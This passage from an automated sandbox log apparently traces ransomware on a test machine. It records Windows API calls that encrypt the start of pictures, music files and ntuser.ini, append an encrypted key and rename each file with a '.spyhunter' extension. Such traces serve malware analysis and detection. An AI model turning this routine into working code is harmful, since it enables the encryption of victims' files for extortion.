SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.793] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed64*=0x2800, lpOverlapped=0x0) returned 1 [0147.794] GetProcessHeap () returned 0x2c0000 [0147.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.794] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.794] WriteFile (in: hFile=0xa0, lpBuffer=0x270eda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x270eda4*, lpNumberOfBytesWritten=0x270ed64*=0x4, lpOverlapped=0x0) returned 1 [0147.794] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed64*=0x30, lpOverlapped=0x0) returned 1 [0147.794] CloseHandle (hObject=0xa0) returned 1 [0147.794] GetProcessHeap () returned 0x2c0000 [0147.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.794] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\-Zqdb rryz2S.bmp.spyhunter") returned 109 [0147.794] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\-Zqdb rryz2S.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\-zqdb rryz2s.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\F-3pXTM_wWEA\\AO-ywnYoFhy76t\\-Zqdb rryz2S.bmp.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\f-3pxtm_wwea\\ao-ywnyofhy76t\\-zqdb rryz2s.bmp.spyhunter")) returned 1 [0147.795] GetProcessHeap () returned 0x2c0000 [0147.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.795] GetProcessHeap () returned 0x2c0000 [0147.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.795] GetProcessHeap () returned 0x2c0000 [0147.795] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67980 | out: hHeap=0x2c0000) returned 1 [0147.795] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eda8 | out: pbBuffer=0x270eda8) returned 1 [0147.795] GetProcessHeap () returned 0x2c0000 [0147.795] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.795] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270eda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270eda0*=0x30) returned 1 [0147.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\147Mwyu9-jdkvISFQl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\147mwyu9-jdkvisfql.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\147Mwyu9-jdkvISFQl.png") returned 77 [0147.795] StrStrW (lpFirst="147Mwyu9-jdkvISFQl.png", lpSrch=".txt") returned 0x0 [0147.795] GetProcessHeap () returned 0x2c0000 [0147.796] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.796] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed64*=0x2800, lpOverlapped=0x0) returned 1 [0147.796] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.796] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed64*=0x2800, lpOverlapped=0x0) returned 1 [0147.796] GetProcessHeap () returned 0x2c0000 [0147.797] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.797] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.797] WriteFile (in: hFile=0xa0, lpBuffer=0x270eda4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x270eda4*, lpNumberOfBytesWritten=0x270ed64*=0x4, lpOverlapped=0x0) returned 1 [0147.797] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed64, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed64*=0x30, lpOverlapped=0x0) returned 1 [0147.797] CloseHandle (hObject=0xa0) returned 1 [0147.797] GetProcessHeap () returned 0x2c0000 [0147.797] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.797] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\147Mwyu9-jdkvISFQl.png.spyhunter") returned 87 [0147.797] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\147Mwyu9-jdkvISFQl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\147mwyu9-jdkvisfql.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\C3saCamdMQr\\147Mwyu9-jdkvISFQl.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\c3sacamdmqr\\147mwyu9-jdkvisfql.png.spyhunter")) returned 1 [0147.798] GetProcessHeap () returned 0x2c0000 [0147.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.798] GetProcessHeap () returned 0x2c0000 [0147.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.798] GetProcessHeap () returned 0x2c0000 [0147.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2fa40 | out: hHeap=0x2c0000) returned 1 [0147.798] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eda0 | out: pbBuffer=0x270eda0) returned 1 [0147.798] GetProcessHeap () returned 0x2c0000 [0147.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.798] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed98*=0x30) returned 1 [0147.798] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6lDSz_pz0gEcgJdejci.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6ldsz_pz0gecgjdejci.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.798] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6lDSz_pz0gEcgJdejci.png") returned 66 [0147.798] StrStrW (lpFirst="6lDSz_pz0gEcgJdejci.png", lpSrch=".txt") returned 0x0 [0147.798] GetProcessHeap () returned 0x2c0000 [0147.798] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.798] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed5c*=0x2800, lpOverlapped=0x0) returned 1 [0147.799] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.799] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed5c*=0x2800, lpOverlapped=0x0) returned 1 [0147.799] GetProcessHeap () returned 0x2c0000 [0147.799] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.799] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.799] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x270ed9c*, lpNumberOfBytesWritten=0x270ed5c*=0x4, lpOverlapped=0x0) returned 1 [0147.800] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed5c*=0x30, lpOverlapped=0x0) returned 1 [0147.800] CloseHandle (hObject=0xa0) returned 1 [0147.800] GetProcessHeap () returned 0x2c0000 [0147.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.800] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6lDSz_pz0gEcgJdejci.png.spyhunter") returned 76 [0147.800] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6lDSz_pz0gEcgJdejci.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6ldsz_pz0gecgjdejci.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\6lDSz_pz0gEcgJdejci.png.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\6ldsz_pz0gecgjdejci.png.spyhunter")) returned 1 [0147.800] GetProcessHeap () returned 0x2c0000 [0147.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.800] GetProcessHeap () returned 0x2c0000 [0147.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.800] GetProcessHeap () returned 0x2c0000 [0147.801] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6388 | out: hHeap=0x2c0000) returned 1 [0147.801] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eda0 | out: pbBuffer=0x270eda0) returned 1 [0147.801] GetProcessHeap () returned 0x2c0000 [0147.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.801] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed98*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed98*=0x30) returned 1 [0147.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1a-WKcGA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1a-wkcga.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1a-WKcGA.gif") returned 55 [0147.801] StrStrW (lpFirst="1a-WKcGA.gif", lpSrch=".txt") returned 0x0 [0147.801] GetProcessHeap () returned 0x2c0000 [0147.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.801] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed5c*=0x12ee, lpOverlapped=0x0) returned 1 [0147.802] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffed12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.802] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x12ee, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed5c*=0x12ee, lpOverlapped=0x0) returned 1 [0147.802] GetProcessHeap () returned 0x2c0000 [0147.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.802] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.802] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x270ed9c*, lpNumberOfBytesWritten=0x270ed5c*=0x4, lpOverlapped=0x0) returned 1 [0147.802] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed5c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed5c*=0x30, lpOverlapped=0x0) returned 1 [0147.802] CloseHandle (hObject=0xa0) returned 1 [0147.802] GetProcessHeap () returned 0x2c0000 [0147.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.803] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1a-WKcGA.gif.spyhunter") returned 65 [0147.803] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1a-WKcGA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1a-wkcga.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\1a-WKcGA.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\1a-wkcga.gif.spyhunter")) returned 1 [0147.803] GetProcessHeap () returned 0x2c0000 [0147.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.803] GetProcessHeap () returned 0x2c0000 [0147.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.803] GetProcessHeap () returned 0x2c0000 [0147.803] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2890 | out: hHeap=0x2c0000) returned 1 [0147.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed98 | out: pbBuffer=0x270ed98) returned 1 [0147.803] GetProcessHeap () returned 0x2c0000 [0147.803] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.803] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed90*=0x30) returned 1 [0147.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e458 | out: hHeap=0x2c0000) returned 1 [0147.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed98 | out: pbBuffer=0x270ed98) returned 1 [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed90*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed90*=0x30) returned 1 [0147.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e3b0 | out: hHeap=0x2c0000) returned 1 [0147.804] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed90 | out: pbBuffer=0x270ed90) returned 1 [0147.804] GetProcessHeap () returned 0x2c0000 [0147.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed88*=0x30) returned 1 [0147.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.805] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0147.805] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0147.805] GetProcessHeap () returned 0x2c0000 [0147.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.805] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed4c*=0x14, lpOverlapped=0x0) returned 1 [0147.806] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.806] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed4c*=0x14, lpOverlapped=0x0) returned 1 [0147.806] GetProcessHeap () returned 0x2c0000 [0147.806] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.806] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.806] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x270ed8c*, lpNumberOfBytesWritten=0x270ed4c*=0x4, lpOverlapped=0x0) returned 1 [0147.806] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed4c*=0x30, lpOverlapped=0x0) returned 1 [0147.806] CloseHandle (hObject=0xa0) returned 1 [0147.806] GetProcessHeap () returned 0x2c0000 [0147.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.806] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.spyhunter") returned 54 [0147.807] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini.spyhunter")) returned 1 [0147.854] GetProcessHeap () returned 0x2c0000 [0147.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.854] GetProcessHeap () returned 0x2c0000 [0147.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0147.854] GetProcessHeap () returned 0x2c0000 [0147.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e308 | out: hHeap=0x2c0000) returned 1 [0147.854] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed90 | out: pbBuffer=0x270ed90) returned 1 [0147.854] GetProcessHeap () returned 0x2c0000 [0147.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0147.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ed88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ed88*=0x30) returned 1 [0147.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g1kU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1ku.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.855] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g1kU.m4a") returned 48 [0147.855] StrStrW (lpFirst="g1kU.m4a", lpSrch=".txt") returned 0x0 [0147.855] GetProcessHeap () returned 0x2c0000 [0147.855] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.855] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0147.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.856] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ed4c*=0x2800, lpOverlapped=0x0) returned 1 [0147.856] GetProcessHeap () returned 0x2c0000 [0147.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.856] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.856] WriteFile (in: hFile=0xa0, lpBuffer=0x270ed8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x270ed8c*, lpNumberOfBytesWritten=0x270ed4c*=0x4, lpOverlapped=0x0) returned 1 [0147.857] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ed4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ed4c*=0x30, lpOverlapped=0x0) returned 1 [0147.857] CloseHandle (hObject=0xa0) returned 1 [0148.066] GetProcessHeap () returned 0x2c0000 [0148.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0148.066] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g1kU.m4a.spyhunter") returned 58 [0148.066] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g1kU.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1ku.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\g1kU.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\g1ku.m4a.spyhunter")) returned 1 [0148.067] GetProcessHeap () returned 0x2c0000 [0148.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0148.067] GetProcessHeap () returned 0x2c0000 [0148.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0148.067] GetProcessHeap () returned 0x2c0000 [0148.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf220 | out: hHeap=0x2c0000) returned 1 [0148.067] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ed88 | out: pbBuffer=0x270ed88) returned 1 [0148.067] GetProcessHeap () returned 0x2c0000 